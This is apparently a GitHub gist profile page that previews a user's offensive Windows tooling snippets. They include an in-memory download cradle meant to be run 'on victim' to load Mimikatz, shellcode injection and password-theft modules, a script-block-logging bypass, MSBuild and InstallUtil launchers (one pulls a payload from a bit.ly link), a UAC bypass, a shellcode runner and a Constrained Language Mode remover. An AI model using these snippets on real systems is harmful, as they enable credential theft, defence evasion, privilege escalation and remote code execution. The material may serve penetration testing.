Skip to content

Instantly share code, notes, and snippets.

Dave Hardy davehardy20

  • UK
Block or report user

Report or block davehardy20

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View powertools-downloader.ps1
Remove-Module PowerView -ErrorAction SilentlyContinue
Remove-Module PowerUp -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/Veil-Framework/PowerTools/archive/master.zip"
$file = "$($env:TEMP)\PowerTools.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
View powersploit-downloader.ps1
Remove-Module PowerSploit -ErrorAction SilentlyContinue
$webclient = New-Object System.Net.WebClient
$url = "https://github.com/mattifestation/PowerSploit/archive/master.zip"
$file = "$($env:TEMP)\PowerSploit.zip"
$webclient.DownloadFile($url,$file)
#Unblock-File -Path $file
$targetondisk = "$([System.Environment]::GetFolderPath('MyDocuments'))\WindowsPowerShell\Modules"
New-Item -ItemType Directory -Force -Path $targetondisk | out-null
$shell_app=new-object -com shell.application
$zip_file = $shell_app.namespace($file)
View in-memory-downloader.ps1
#Most Useful PowerSploit and PowerTools Modules that can be loaded into memory
# Use this line in PowerShell on victim to pull into memory the modules
#(New-Object Net.WebClient).DownloadString("https://gist.githubusercontent.com/davehardy20/a81fb1eaabf2512fce88/raw/0d92460eb8d43183d2ce42e3e7cfa367740426b6/in-memory-downloader.ps1")|iex
$downloadcradle = New-Object Net.WebClient
$modules = @(
"https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-DllInjection.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-NinjaCopy.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1","https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/VolumeShadowCopyTools.
@davehardy20
davehardy20 / keybase.md
Created Jun 24, 2017
Android created Gist
View keybase.md

Keybase proof

I hereby claim:

  • I am davehardy20 on github.
  • I am davehardy20 (https://keybase.io/davehardy20) on keybase.
  • I have a public key ASCgZJlcOaliMj7vAQc2qT6UoN5TfANsZY9TzAg2WSAoLgo

To claim this, I am signing this object:

View bypass.xml
<?xml version="1.0"?>
<command>
<![CDATA[
function Invoke-WMIObfuscatedPSCommand
function invoke-bypass
{
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetField"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0
@davehardy20
davehardy20 / msbuilder.xml
Created Jul 27, 2017
MSBuild Execute Assembly From Environment Variable
View msbuilder.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe msbuilder.xml -->
<!-- Populate the Env Var like this or many other ways: -->
<!-- $env:TheThingIs = (New-Object Net.Webclient).downloadstring('http://bit.ly/2tDkg2e') -->
<!-- This has the advantage of keeping the assembly out of the xml on disk if it were ever recovered -->
<!-- This is just a simple example... MSBuild is a rich scripting engine with lots of abiltiy to customize the build process -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
@davehardy20
davehardy20 / EventVwrBypass.cs
Created Jul 27, 2017
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
View EventVwrBypass.cs
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
@davehardy20
davehardy20 / katz.xml
Created Jul 27, 2017
MSBuild - Mimikatz - Server 2016
View katz.xml
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@davehardy20
davehardy20 / PoCPowerShellCoreShellcodeRunner.ps1
Created Jul 27, 2017
A simple PoC shellcode runner that works in PowerShell Core on Nano Server and demonstrates how to call Win32 APIs
View PoCPowerShellCoreShellcodeRunner.ps1
<#
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
#>
function Invoke-VirtualAlloc {
Param (
[IntPtr] $lpAddress,
[UInt32] $dwSize,
[UInt32] $flAllocationType,
View Remove-ConstrainedLanguageMode.psm1
function Remove-ConstrainedLanguageMode {
<#
.Synopsis
Set language mode for a powershell session to 'full'.
.Description
Set language mode for a powershell session to 'full'. Leverages 'InstallUtil'
and the Microsoft.Diagnostics.Runtime.dll resouces to adjust in memory values.
.Example
You can’t perform that action at this time.